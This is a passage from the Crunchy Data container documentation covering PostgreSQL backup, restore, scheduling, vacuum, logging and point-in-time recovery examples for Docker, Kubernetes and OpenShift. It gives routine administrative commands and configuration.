(pgBaseBackup) and to\nexec (pgBackRest). See the link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/scheduler-sa.json[scheduler example]\nfor the required permissions on this account.\n\n==== pgBackRest Schedules\n\nTo configure Crunchy Scheduler to create pgBackRest backups the following is required:\n\n* pgBackRest schedule definition requires a deployment name. The PostgreSQL pod should be created by a deployment.\n\n==== pgBaseBackup Schedules\n\nTo configure Crunchy Scheduler to create pgBaseBackup scheduled backups, the following is required:\n\n* The name of the secret that contains the username and password the Scheduler will use to\n configure the job template. 
See link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/primary\/secret.json[the primary secret example].\n for the structure required by the Scheduler.\n* The name of the PVC created for the backups. This should be created by the user prior to scheduling the task.\n\n==== Kubernetes and OpenShift\n\nFirst, start the PostgreSQL example created for the Scheduler by running the following commands:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\/primary\n.\/run.sh\n....\n\nThe pod created should show a ready status before proceeding.\n\nNext, start the scheduler by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/run.sh\n....\n\nOnce the scheduler is deployed, register the backup tasks by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/add-schedules.sh\n....\n\nThe scheduled tasks will (these are just for fast results, not recommended for production):\n\n* take a backup every minute using pgBaseBackup\n* take a full pgBackRest backup every even minute\n* take a diff pgBackRest backup every odd minute\n\nView the logs for the `scheduler` pod until the tasks run:\n\n....\n${CCP_CLI?} logs scheduler -f\n....\n\nView the `pgBaseBackup` pods results after the backup completes:\n\n....\n${CCP_CLI?} logs <basebackup pod name>\n....\n\nView the `pgBackRest` backups via exec after the backup completes:\n\n....\n${CCP_CLI?} exec -ti <primary deployment pod name> -- pgbackrest info\n....\n\nClean up the examples by running the following commands:\n\n....\n$CCPROOT\/examples\/kube\/scheduler\/primary\/cleanup.sh\n$CCPROOT\/examples\/kube\/scheduler\/cleanup.sh\n....\n\n=== Vacuum\n\nYou can perform a PostgreSQL vacuum command by running the crunchy-vacuum\ncontainer. You specify a database to vacuum using environment variables. By default,\nvacuum is executed against the *primary* example container.\n\nThe crunchy-vacuum container image exists to allow a DBA a way to run a job either\nindividually or scheduled to perform a variety of vacuum operations.\n\nThis example performs a vacuum on a single table in the primary PostgreSQL\ndatabase. The crunchy-vacuum image is executed with the PostgreSQL connection\nparameters to the single-primary PostgreSQL container. The type of vacuum performed is\ndictated by the environment variables passed into the job; these are defined with further detail\nlink:\/container-specifications\/crunchy-vacuum[here].\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/vacuum\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/vacuum\/\n.\/run.sh\n....\n\nVerify the job is completed:\n....\n${CCP_CLI} get job\n....\n\n=== systemd\n\nThe crunchy-pg.service is an example of a systemd unit file\nthat starts and stops a container named crunchy-pg that\nhas already been created.\n\nThe example scripts are located in the following directory:\n....\n$CCPROOT\/examples\/systemd\/\n....\n\nThere are two scripts within the directory.\n\n....\ntest-start.sh\n....\n\nThis script is called by the systemd start execution. The trick\nwith this script is that it blocks forever after starting the\ndocker crunchy-pg container. 
The blocking in the script\nkeeps systemd happy and thinking that this is a normal daemon.\n\n....\ntest-stop.sh\n....\n\nThis script stops the test-start.sh script and also stops the\ncrunchy-pg Docker container.\n\n=== Centralized Logging\n\nThe logs generated by containers are critical for deployments because they provide insights into the\nhealth of the system. PostgreSQL logs are very detailed and there is some information that can only be\nobtained from logs (but not limited to):\n\n* Connections and Disconnections of users\n* Checkpoint Statistics\n* PostgreSQL Server Errors\n\nAggregrating container logs across multiple hosts allows administrators to audit, debug problems and prevent\nrepudiation of misconduct.\n\nIn the following example we will demonstrate how to setup Kubernetes and OpenShift to use centralized logging by using\nan EFK (Elasticsearch, Fluentd and Kibana) stack. Fluentd will run as a daemonset on each host within the Kubernetes\ncluster and extract container logs, Elasticsearch will consume and index the logs gathered by Fluentd and Kibana will allow\nusers to explore and visualize the logs via a web dashboard.\n\nTo learn more about the EFK stack, see the following:\n\n* https:\/\/www.elastic.co\/products\/elasticsearch\n* https:\/\/www.fluentd.org\/architecture\n* https:\/\/www.elastic.co\/products\/kibana\n\n==== Configure PostgreSQL for Centralized Logging\n\nBy default, Crunchy PostgreSQL logs to files in the `\/pgdata` directory. In order to get the logs\nout of the container we need to configure PostgreSQL to log to `stdout`.\n\nThe following settings should be configured in `postgresql.conf` to make PostgreSQL log to `stdout`:\n\n```\nlog_destination = 'stderr'\nlogging_collector = off\n```\n\n{{% notice warning %}}\nChanges to logging settings require a restart of the PostgreSQL container to take effect.\n{{% \/notice %}}\n\n==== Deploying the EFK Stack On OpenShift Container Platform\n\nOpenShift Container Platform can be installed with an EFK stack. For more information about\nconfiguring OpenShift to create an EFK stack, see the official documentation:\n\n* https:\/\/docs.openshift.com\/container-platform\/3.10\/install_config\/aggregate_logging.html\n\n==== Deploying the EFK Stack On Kubernetes\n\nFirst, deploy the EFK stack by running the example using the following commands:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/efk\n.\/run.sh\n....\n\n{{% notice warning %}}\nElasticsearch is configured to use an `emptyDir` volume in this example. 
Configure this example to provide a\npersistent volume when deploying into production.\n{{% \/notice %}}\n\n\nNext, verify the pods are running in the `kube-system` namespace:\n\n```\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=elasticsearch-logging\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=fluentd-es\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=kibana-logging\n```\n\nIf all pods deployed successfully elasticsearch should already be receiving container logs from Fluentd.\n\nNext we will deploy a PostgreSQL Cluster (primary and replica deployments) to demonstrate PostgreSQL logs\nare being captured by Fluentd.\n\nDeploy the PostgreSQL cluster by running the following:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/postgres-cluster\n.\/run.sh\n....\n\nNext, verify the pods are running:\n\n....\n${CCP_CLI?} get pods --selector=k8s-app=postgres-cluster\n....\n\nWith the PostgreSQL successfully deployed, we can now query the logs in Kibana.\n\nWe will need to setup a port-forward to the Kibana pod to access it. To do that\nwe first get the name of the pod by running the following command:\n\n....\n${CCP_CLI?} get pod --selector=k8s-app=kibana-logging -n kube-system\n....\n\nNext, start the port-forward:\n\n....\n${CCP_CLI?} port-forward <KIBANA POD NAME> 5601:5601 -n kube-system\n....\n\nTo access the web dashboard navigate in a browser to `127.0.0.1:5601`.\n\nFirst, click the `Discover` tab and setup an index pattern to use for queries.\n\nThe index pattern name we will use is `logstash-*` because Fluentd is configured to\ngenerate logstash style logs.\n\nNext we will configure the `Time Filter field name` to be `@timestamp`.\n\nNow that our index pattern is created, we can query for the container logs.\n\nClick the `Discover` tab and use the following queries:\n\n....\n# KUBERNETES\nCONTAINER_NAME: *primary* AND MESSAGE: \".*LOG*\"\n# OpenShift\nkubernetes.pod_name: \"primary\" AND log\n....\n\nFor more information about querying Kibana, see the official documentation: https:\/\/www.elastic.co\/guide\/en\/beats\/packetbeat\/current\/kibana-queries-filters.html\n\n== Backup and Restoration\n\n=== pg_dump\n\nThe script assumes you are going to backup the *primary* example and that container\nis running.\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nA successful backup will perform pg_dump\/pg_dumpall on the primary and store\nthe resulting files in the mounted volume under a directory named `<HOSTNAME>-backups`\nas a sub-directory, then followed by a unique backup directory based upon a\ndate and timestamp - allowing any number of backups to be kept.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgdump\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgdump\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. 
You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgdump.json` file within that directory specifies options that control the behavior of the pgdump job.\nExamples of this include whether to run pg_dump vs pg_dumpall and advanced options for specific backup use cases.\n\n=== pg_restore\n\nThe script assumes you are going to restore to the *primary* example and that container\nis running and a backup has been created using the `pgdump` example..\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nSuccessful use of the `crunchy-pgrestore` container will run a job to restore files generated by\npg_dump\/pg_dumpall to a container via psql\/pg_restore; then container will terminate successfully\nand signal job completion.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the restore with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgrestore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nBy default, pgrestore container will automatically restore from the most recent backup.\nIf you want to restore to a specific backup, edit the `pgrestore.json` file and update the\n`PGRESTORE_BACKUP_TIMESTAMP` setting to specify the backup path you want to restore with. For example:\n....\n\"name\":\"PGRESTORE_BACKUP_TIMESTAMP\",\n\"value\":\"2018-03-27-14-35-33\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgrestore\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgrestore.json` file within that directory specifies options that control the behavior of the pgrestore job.\n\n=== pgBackRest\n\npgbackrest is a utility that performs a backup, restore, and archive\nfunction for a PostgreSQL database. pgbackrest is written and\nmaintained by David Steele, and more information can be found on the\nlink:http:\/\/www.pgbackrest.org\/[official website].\n\nBackups are currently performed by manually executing pgbackrest commands against the desired pod.\nRestores can now be performed via the crunchy-backrest-restore container, which offers FULL or\nDELTA restore capability.\n\npgbackrest is configured using a `pgbackrest.conf` file that is\nmounted into the crunchy-postgres container at `\/pgconf`.\n\nIf you place a `pgbackrest.conf` file within this mounted directory, it\nwill trigger the use of pgbackrest within the PostgreSQL container\nas the `archive_command` and will turn on the `archive_mode` to begin\narchival. 
It is still required to define the `ARCHIVE_TIMEOUT` environment\nvariable within your container configuration as it is set to\na disable value of 0 by default.\n\nThe following changes will be made to the container's `postgresql.conf`\nfile:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\nARCHIVE_COMMAND='pgbackrest --stanza=db archive-push %p'\n....\n\nIf you are using a crunchy-postgres image older than 1.7.1, `archive_command` must specify where\nthe `pgbackrest.conf` file is located:\n....\nARCHIVE_COMMAND='pgbackrest --config=\/pgconf\/pgbackrest.conf --stanza=db archive-push %p'\n....\n\n{{% notice warning %}}\nThis requires you use a pgbackrest stanza name of *db* within the\n`pgbackrest.conf` file you mount.\n{{% \/notice %}}\n\nWhen set, WAL files generated by the database will be written\nout to the `\/backrestrepo\/HOSTNAME-backups` mount point.\n\nAdditionally, the Crunchy Postgres container can templatize `pgbackrest.conf` files\nby searching for the HOSTNAME values in a mounted `pgbackrest.conf` file.\n\nFor example, `db-path=\/pgdata\/HOSTNAME` will render to `db-path=\/pgdata\/primary` if\nthe container's hostname is primary. HOSTNAME will be replaced with the value of\n`PGDATA_PATH_OVERRIDE` when working with deployments\/replicasets.\n\n{{% notice warning %}}\nThe templating example above works for `db-path` settings, however, `repo-path` should\nfollow the convention `repo-path=\/backrestrepo\/HOSTNAME-backups` in cases where\nvolumes are being mounted to a single mount point (such as hostPath or NFS). Without\nthe additional `-backups` the backups will populate in the `pgdata` directory.\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\npgBackRest supports asyncronous archiving to pull and push Write Ahead Logs.\nAsynchronous operation is more efficient because it can reuse connections and take\nadvantage of parallelism. 
For more information on async archiving, see the pgBackRest\nlink:https:\/\/pgbackrest.org\/user-guide.html#async-archiving[official documentation].\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured and archiving asynchronously.\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest-async-archive \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\nThere are three options to choose from when performing a restore:\n\n * Delta - only restore missing files from PGDATA\n * Full - restore all files, pgdata must be empty\n * Point in Time Recovery (PITR) - delta restore to a certain point in time\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. 
It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New PVC for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n==== Docker\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. 
It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New Volume for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n=== pgBackRest with SSHD\n\nThe PostgreSQL and PostgreSQL GIS containers can enable an SSH daemon to allow developers\nto do DBA tasks on the database server without the need for exec privileges. An administrator\nwho deploys the SSHD enabled PostgreSQL database can specify the authorized public keys for\naccess to the database server.\n\nIn order to activate SSHD in the PostgreSQL containers, the following files need to be\nmounted to the PostgreSQL container:\n\n- SSH Host keys mounted on the \/sshd volume. Three keys are required:\n\n * ssh_host_rsa_key\n * ssh_host_ecdsa_key\n * ssh_host_ed25519_key\n\n- sshd_config mounted on the \/pgconf volume\n- authorized_keys mounted on the \/pgconf volume\n\nSSHD can be enabled in the PostgreSQL containers by adding the following line:\n....\nENABLE_SSHD=true\n....\n\nThe *authorized_keys* file is mounted on the *\/pgconf* directory. 
In order to support\nusing this mount for authentication the following must be set in *sshd_config*:\n....\nAuthorizedKeysFile \/pgconf\/authorized_keys\nStrictModes no\n....\n\nFor OpenShift deployments, the following configuration needs to be set in *sshd_config*:\n....\nUsePAM no\n....\n\n==== Docker\n\nStart the example as follows:\n\n....\ncd $CCPROOT\/examples\/docker\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * A volume named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A volume named sshd containing the SSH Host keys\n * postgres-sshd container pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n\nAfter running the example, SSH to the container using the forwarded port 2022:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@0.0.0.0\n....\n\n==== Kubernetes \/ OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * A configMap named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A secret named sshd-secrets containing the SSH Host keys\n * postgres-sshd pod with pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n * postgres-sshd service with port 2022 for SSH\n\nAfter running the example, SSH to the service using the postgres-sshd service available in Kubernetes:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd\n....\n\n==== Using pgBackrest via SSH\n\nIf a pgbackrest.conf file is located on the \/pgconf volume and archiving is enabled, it's possible to\nrun backups using the pgBackrest utility.\n\nWith the SSHD service running, the following command will issue a pgBackrest backup.\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest --stanza=db backup\n....\n\nTo list all the available pgBackrest backups, run the following:\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest info\n....\n\n=== pg_basebackup\n\nThe script assumes you are going to backup the *primary*\ncontainer created in the first example, so you need to ensure\nthat container is running. This example assumes you have configured storage as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration documentation]. Things to point out with this example\ninclude its use of persistent volumes and volume claims to store the backup data files.\n\nA successful backup will perform `pg_basebackup` on the *primary* container and store\nthe backup in the `$CCP_STORAGE_PATH` volume under a directory named `primary-backups`. Each\nbackup will be stored in a subdirectory with a timestamp as the name, allowing any number of backups to be kept.\n\nThe backup script will do the following:\n\n* Start up a backup container named backup\n* Run `pg_basebackup` on the container named *primary*\n* Store the backup in the `\/tmp\/backups\/primary-backups` directory\n* Exit after the backup\n\nWhen you are ready to restore from the backup, the restore example runs a PostgreSQL container\nusing the backup location. 
Upon initialization, the container will use rsync to copy the backup\ndata to this new container and then launch PostgreSQL using the original backed-up data.\n\nThe restore script will do the following:\n\n* Start up a container named *restore*\n* Copy the backup files from the previous backup example into `\/pgdata`\n* Start up the container using the backup files\n* Map the PostgreSQL port of 5432 in the container to your local host port of 12001\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/backup\n.\/run.sh\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n\n....\ndocker logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH is as followed:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nWhen you are ready to restore from the backup created, run the following example:\n....\ncd $CCPROOT\/examples\/docker\/restore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/backup\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n....\nkubectl logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH defined as a variable within the JSON script is as follows:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/restore\n.\/run.sh\n....\n\nTest the restored database as follows:\n....\npsql -h restore -U postgres postgres\n....\n\n=== Point in Time Recovery (PITR)\n\nPITR (point-in-time-recovery) is a feature that allows for recreating a database\nfrom backup and log files at a certain point in time. This is done using a write\nahead log (WAL) which is kept in the `pg_wal` directory within `PGDATA`. Changes\nmade to the database files over time are recorded in these log files, which allows\nit to be used for disaster recovery purposes.\n\nWhen using PITR as a backup method, in order to restore from the last checkpoint in\nthe event of a database or system failure, it is only necessary to save these log\nfiles plus a full backup. 
This provides an additional advantage in that it is not\nnecessary to keep multiple full backups on hand, which consume space and time to create.\nThis is because point in time recovery allows you to \"replay\" the log files and recover\nyour database to any point since the last full backup.\n\nMore detailed information about Write Ahead Log (WAL) archiving can be found\nlink:https:\/\/www.postgresql.org\/docs\/10\/static\/continuous-archiving.html[here.]\n\nBy default in the crunchy-postgres container, WAL logging is *not* enabled.\nTo enable WAL logging *outside of this example*, set the following environment\nvariables when starting the crunchy-postgres container:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\n....\n\nThese variables set the same name settings within the `postgresql.conf`\nfile that is used by the database. When set, WAL files generated by the database\nwill be written out to the `\/pgwal` mount point.\n\nA full backup is required to do a PITR. crunchy-backup currently\nperforms this role within the example, running a `pg_basebackup` on the database.\nThis is a requirement for PITR. After a backup is performed, code is added into\ncrunchy-postgres which will also check to see if you want to do a PITR.\n\nThere are three volume mounts used with the PITR example.\n\n* `\/recover` - When specified within a crunchy-postgres container, PITR is activated during container startup.\n* `\/backup` - This is used to find the base backup you want to recover from.\n* `\/pgwal` - This volume is used to write out new WAL files from the newly restored database container.\n\nSome environment variables used to manipulate the point in time recovery logic:\n\n* The `RECOVERY_TARGET_NAME` environment variable is used to tell the PITR logic what the name of the target is.\n* `RECOVERY_TARGET_TIME` is also an optional environment variable that restores using a known time stamp.\n\nIf you don't specify either of these environment variables, then the PITR logic will assume you want to\nrestore using all the WAL files or essentially the last known recovery point.\n\nThe `RECOVERY_TARGET_INCLUSIVE` environment variable is also available to\nlet you control the setting of the `recovery.conf` setting `recovery_target_inclusive`.\nIf you do not set this environment variable the default is *true*.\n\nOnce you recover a database using PITR, it will be in read-only mode. To\nmake the database resume as a writable database, run the following SQL command:\n....\npostgres=# select pg_wal_replay_resume();\n....\n\n{{% notice tip %}}\nIf you're running the PITR example for *PostgreSQL versions 9.5 or 9.6*, please note that\nstarting in PostgreSQL version 10, the `pg_xlog` directory was renamed to `pg_wal`. Additionally, all usages\nof the function `pg_xlog_replay_resume` were changed to `pg_wal_replay_resume`.\n{{% \/notice %}}\n\nIt takes about 1 minute for the database to become ready for use after initially starting.\n\n{{% notice warning %}}\nWAL segment files are written to the *\/tmp* directory. 
Leaving the example running\nfor a long time could fill up your \/tmp directory.\n{{% \/notice %}}\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate a database container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pitr\n.\/run-pitr.sh\n....\n\nNext, we will create a base backup of that database using this:\n....\n.\/run-backup-pitr.sh\n....\n\nAfter creating the base backup of the database, WAL segment files are created every 60 seconds\nthat contain any database changes. These segments are stored in the\n`\/tmp\/pitr\/pitr\/pg_wal` directory.\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments. These labels can be\nused to mark the points in the recovery process that will be referenced when\ncreating the restored database.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\ndocker stop pitr\n....\n\nNext, let's edit the restore script to use the base backup files\ncreated in the step above. You can view the backup path name\nunder the `\/tmp\/backups\/pitr-backups\/` directory. You will see\nanother directory inside of this path with a name similar to\n`2018-03-21-21-03-29`. Copy and paste that value into the\n`run-restore-pitr.sh` script in the `BACKUP` environment variable.\n\nAfter that, run the script.\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nThe WAL segments are read and applied when restoring from the database\nbackup. At this point, you should be 